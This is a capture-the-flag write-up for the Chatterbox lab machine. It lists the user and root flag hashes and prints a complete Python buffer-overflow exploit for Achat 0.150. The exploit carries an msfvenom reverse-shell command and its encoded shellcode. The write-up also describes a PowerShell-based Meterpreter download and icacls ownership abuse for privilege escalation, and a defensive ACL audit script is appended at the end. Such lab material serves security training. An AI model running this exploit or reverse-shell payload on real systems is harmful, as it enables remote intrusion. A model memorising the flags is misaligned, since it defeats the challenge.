# Chatterbox

## Chatterbox - 10.10.10.74

### Target Enumeration:

OS: Windows

IP: 10.10.10.74

User: 72290246dfaedb1e3e3ac9d6fb306334

Root: a673d1b1fa95c276c5ef2aa13d9dcc7c

### Ports / Services / Software Versions Running

9255/tcp open mon

9256/tcp open -

### Vulnerability Exploited:

Achat Remote Buffer Overflow.

<https://www.exploit-db.com/exploits/36025/>

### Privilege Escalation:

Icacls on root.txt allows the current user to read any file owned by the administrator.

### Exploiting the host:

Nmap took too long, so I used Sparta on this one:

![](https://lh3.googleusercontent.com/-fqK7qsF9rEV5dr1Aln6bbANzraH2-cSguWgjpjoVcu0nwKHpivA_RtvmVTI-3d0FPPW6XyK6uvwHwIzfkfsQyXXQfkkjA9MUv1lsd7uqd18zTg1lLBAh9BRgqaaApu45Dva6Y2C)

Sparta revealed ports 9255 and 9256 open.

Googling the port gave us Achat.

![](https://lh5.googleusercontent.com/E6VX3_8RL-n2JenLZISL4LDlUnHHzSZrJDhJNWoCO5wPPXriWV52PyAczx25KfmRC7vOD5buBo88kb7C5D4RZJ98LrdoAcAude92iJuRaOoWOWH9bykcuGlnX1Mwzu5VXnMRUCIq)

That is a really buggy Metasploit exploit, so we found a better one online:

<https://www.exploit-db.com/exploits/36025/>

Generate your shellcode:

![](https://lh5.googleusercontent.com/HxO8OtvKjcLO-wJK7HjmLpyYW6nFHDCoD3Z0c9kxzkRuaLeHZrsur6LzN5d0krzWzm3N6MAaD04xLsQobueMKKYqAwkvI8sszHu3dbv2bk6pBImo2ImfIt_zGXLkJZD6Fg2TfEHn)

Paste that into the script so it looks as follows:

![](https://lh4.googleusercontent.com/Vwg-z5vRhbF0xWqoILbHMb3cpSK6Wh9fuxdb9-14TvU5lZhUXFUcKNdxf1DRGFTsX_wV4fnxvDtkkuBM5DIi5TRVGYd8RHdA0oUbnlbkDcGi1_0DEF4u91Ar_-V0kovhxQ_bI7Jj)

```python
#!/usr/bin/python
# Author KAhara MAnhara - modified
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit

import socket
import sys, time

# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes

buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x47\x78\x53\x52"
buf += "\x4d\x30\x4d\x30\x59\x70\x43\x30\x45\x39\x6b\x35\x6e"
buf += "\x51\x55\x70\x71\x54\x72\x6b\x72\x30\x6c\x70\x54\x4b"
buf += "\x4f\x62\x7a\x6c\x72\x6b\x42\x32\x6e\x34\x44\x4b\x30"
buf += "\x72\x6b\x78\x6a\x6f\x37\x47\x6d\x7a\x4f\x36\x30\x31"
buf += "\x69\x6f\x66\x4c\x6f\x4c\x51\x51\x51\x6c\x59\x72\x4e"
buf += "\x4c\x6b\x70\x79\x31\x46\x6f\x4c\x4d\x49\x71\x57\x57"
buf += "\x79\x52\x39\x62\x4e\x72\x32\x37\x52\x6b\x30\x52\x4a"
buf += "\x70\x32\x6b\x4e\x6a\x4f\x4c\x72\x6b\x4e\x6c\x4b\x61"
buf += "\x71\x68\x69\x53\x6e\x68\x79\x71\x68\x51\x32\x31\x62"
buf += "\x6b\x50\x59\x6b\x70\x59\x71\x46\x73\x74\x4b\x61\x39"
buf += "\x7a\x78\x5a\x43\x6e\x5a\x6d\x79\x34\x4b\x30\x34\x74"
buf += "\x4b\x49\x71\x57\x66\x30\x31\x49\x6f\x74\x6c\x56\x61"
buf += "\x46\x6f\x6c\x4d\x59\x71\x69\x37\x4e\x58\x67\x70\x70"
buf += "\x75\x69\x66\x49\x73\x53\x4d\x39\x68\x4f\x4b\x71\x6d"
buf += "\x6b\x74\x73\x45\x37\x74\x51\x48\x54\x4b\x6f\x68\x6f"
buf += "\x34\x79\x71\x5a\x33\x32\x46\x44\x4b\x6a\x6c\x30\x4b"
buf += "\x52\x6b\x71\x48\x6d\x4c\x39\x71\x56\x73\x72\x6b\x6c"
buf += "\x44\x32\x6b\x6d\x31\x48\x50\x31\x79\x4d\x74\x6f\x34"
buf += "\x6e\x44\x4f\x6b\x31\x4b\x70\x61\x31\x49\x71\x4a\x52"
buf += "\x31\x6b\x4f\x47\x70\x51\x4f\x71\x4f\x70\x5a\x34\x4b"
buf += "\x4c\x52\x58\x6b\x72\x6d\x4f\x6d\x4f\x78\x30\x33\x50"
buf += "\x32\x79\x70\x69\x70\x53\x38\x52\x57\x73\x43\x50\x32"
buf += "\x31\x4f\x61\x44\x32\x48\x50\x4c\x30\x77\x4f\x36\x7a"
buf += "\x67\x6b\x4f\x36\x75\x36\x58\x62\x70\x49\x71\x59\x70"
buf += "\x49\x70\x6f\x39\x35\x74\x6f\x64\x32\x30\x43\x38\x4b"
buf += "\x79\x63\x50\x30\x6b\x4b\x50\x79\x6f\x48\x55\x42\x30"
buf += "\x70\x50\x42\x30\x42\x30\x51\x30\x62\x30\x61\x30\x6e"
buf += "\x70\x63\x38\x39\x5a\x7a\x6f\x79\x4f\x49\x50\x69\x6f"
buf += "\x78\x55\x45\x47\x32\x4a\x69\x75\x31\x58\x49\x7a\x4a"
buf += "\x6a\x6a\x6e\x6b\x58\x33\x38\x39\x72\x49\x70\x4a\x61"
buf += "\x65\x6b\x72\x69\x49\x56\x70\x6a\x4a\x70\x6f\x66\x51"
buf += "\x47\x70\x68\x44\x59\x46\x45\x53\x44\x43\x31\x59\x6f"
buf += "\x5a\x35\x35\x35\x59\x30\x62\x54\x6a\x6c\x49\x6f\x4e"
buf += "\x6e\x4c\x48\x44\x35\x78\x6c\x43\x38\x78\x70\x74\x75"
buf += "\x65\x52\x42\x36\x79\x6f\x79\x45\x62\x48\x30\x63\x52"
buf += "\x4d\x52\x44\x79\x70\x32\x69\x68\x63\x6f\x67\x4f\x67"
buf += "\x71\x47\x4c\x71\x7a\x56\x42\x4a\x6a\x72\x50\x59\x6e"
buf += "\x76\x49\x52\x4b\x4d\x42\x46\x35\x77\x31\x34\x6c\x64"
buf += "\x4d\x6c\x5a\x61\x6d\x31\x44\x4d\x31\x34\x4e\x44\x4a"
buf += "\x70\x76\x66\x6b\x50\x4e\x64\x51\x44\x30\x50\x6e\x76"
buf += "\x31\x46\x30\x56\x31\x36\x50\x56\x70\x4e\x50\x56\x72"
buf += "\x36\x71\x43\x51\x46\x42\x48\x43\x49\x68\x4c\x4f\x4f"
buf += "\x62\x66\x6b\x4f\x76\x75\x74\x49\x59\x50\x6e\x6e\x62"
buf += "\x36\x51\x36\x59\x6f\x30\x30\x33\x38\x79\x78\x53\x57"
buf += "\x4b\x6d\x51\x50\x4b\x4f\x78\x55\x45\x6b\x4c\x30\x76"
buf += "\x55\x35\x52\x70\x56\x62\x48\x63\x76\x34\x55\x77\x4d"
buf += "\x33\x6d\x49\x6f\x4a\x35\x4d\x6c\x4b\x56\x73\x4c\x7a"
buf += "\x6a\x53\x50\x39\x6b\x79\x50\x71\x65\x7a\x65\x67\x4b"
buf += "\x70\x47\x6d\x43\x62\x52\x32\x4f\x4f\x7a\x69\x70\x42"
buf += "\x33\x4b\x4f\x37\x65\x41\x41"

# Create a UDP socket - Change this host!!!
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"

print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()
```

Execute the script:

![](https://lh3.googleusercontent.com/Nx_PqfYjsNxq3AoZcHagdU5_HnexbdWTMpcR5FBIP86iV6I-aGgjp9kAxu8Dv4mgGJc3lFvg88IXylG6YuaPbNGACxVKhUTDLKKQvifcDkQZoITqaxcfsd5_BBhy152G_0X6LBhL)

Now you have a shell.

![](https://lh3.googleusercontent.com/arJDkm8nRpcOq2zRvwMq2pvtHM1GXb1p7uV62-KOanUSgay7hABYCzHKYxwSSAESFSCUNk5_fXBS1x26AObjcsehp-_z_vT0iCAENPlyYRVZxYnDCJs4riZmhIO6D3TxL8S9MEnZ)

Upgrade your shell to Meterpreter. As the target is Windows 7, we will use PowerShell to download it.

Generate a shell with msfvenom:

![](https://lh3.googleusercontent.com/6QaMvyAsg8eGDbCHof3UCybA5WGJRgN7EVGV0j9KsajsvNeIKYIZAUFZ6-MlQ2AoMKvL4KPLErVmsssjVl8ZjfYE5uwaG47G_M6HJHKi3HXBmbHSAW1EoEUMAoMWhkfeEgzshH8n)

Start your Python web server and a Metasploit listener.

Download the file with the following commands and execute it:

![](https://lh3.googleusercontent.com/pZWIPrYUBBeu1QVtczrC3ZW8DdmG5G-i-iS8-QsXIYHkj8WoW6SGLCQVITJO8h3GJSWwktVwXe87kca9v8shnekILJWuk54bff222Ixl_LMNeoiYv7sLT4jhn_F_BgyFWYZceoLy)

Now you have a Meterpreter shell.

![](https://lh6.googleusercontent.com/AChsp0AWBPO8bZLeu6SACsorx0FUonLkjiAirLjwKoVfrXiXtGX22Al9XI6WK0kykFVSC0TjfgDN9Z3zFZhkZIr4rzFbNO7NYef89KIqN8QOxSpKUBWTJ6l8Mu_NCu7soNCp7Ghc)

Enumerating the system shows that you can access the Administrator's desktop but cannot read the file.

Use the following command to assign ownership to alfred and collect the root flag:

![](https://lh3.googleusercontent.com/3DhZcwa_3MHSR3Aiq-4INOR8y8HEadskSWr5Nt2XTcoeXWX5kBFjnkoSHplf8kIIFhfEfGo3y16rqxfHGN4C2LbMbS7F9Ibse2c_GhTYP3wSHvu4sEVK9N5YWCJKyskVk4pfX8bh)
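The escalation above works because a low-privilege account can re-own a file sitting in the Administrator's Desktop, which a defender wants to spot before anyone else does. The following PowerShell audit is an added example, not part of the original writeup: it walks the Administrator profile and reports every owner or allow entry that hands a non-administrative principal read, write, permission-change or take-ownership rights; the profile path and the trusted-principal list are assumptions for a default Windows 7 host and can be overridden through the parameters.

```powershell
# Audit an administrator profile for ACL entries that let a non-administrative account
# read, rewrite or re-own its files (the weakness the icacls step in this writeup abuses).
# Added example, not from the original writeup; $Root and $Trusted are assumptions.
param(
    [string]$Root = 'C:\Users\Administrator',
    [string[]]$Trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', "$env:COMPUTERNAME\Administrator")
)

# Rights of interest: reading the data, writing it, changing the DACL, or taking ownership.
# FullControl carries all of these bits, so it is matched without being listed separately.
$Interesting = [System.Security.AccessControl.FileSystemRights]::ReadData -bor
               [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
               [System.Security.AccessControl.FileSystemRights]::TakeOwnership

$items = @(Get-Item -LiteralPath $Root -Force) +
         @(Get-ChildItem -LiteralPath $Root -Recurse -Force -ErrorAction SilentlyContinue)

foreach ($item in $items) {
    $acl = Get-Acl -LiteralPath $item.FullName -ErrorAction SilentlyContinue
    if (-not $acl) { continue }

    # An untrusted owner can rewrite the DACL at will, whatever the explicit entries say.
    if ($Trusted -notcontains $acl.Owner) {
        [pscustomobject]@{ Path = $item.FullName; Principal = $acl.Owner; Finding = 'Owner' }
    }

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($Trusted -contains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $Interesting) -eq 0) { continue }
        $inherited = if ($ace.IsInherited) { ' (inherited)' } else { ''}
        [pscustomobject]@{
            Path      = $item.FullName
            Principal = $ace.IdentityReference.Value
            Finding   = "Allow $($ace.FileSystemRights)$inherited"
        }
    }
}
```

Run it from an elevated prompt so that every directory under the profile can be enumerated; a clean host returns nothing, and any line naming an ordinary user account on Desktop or its contents is the entry to remove.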


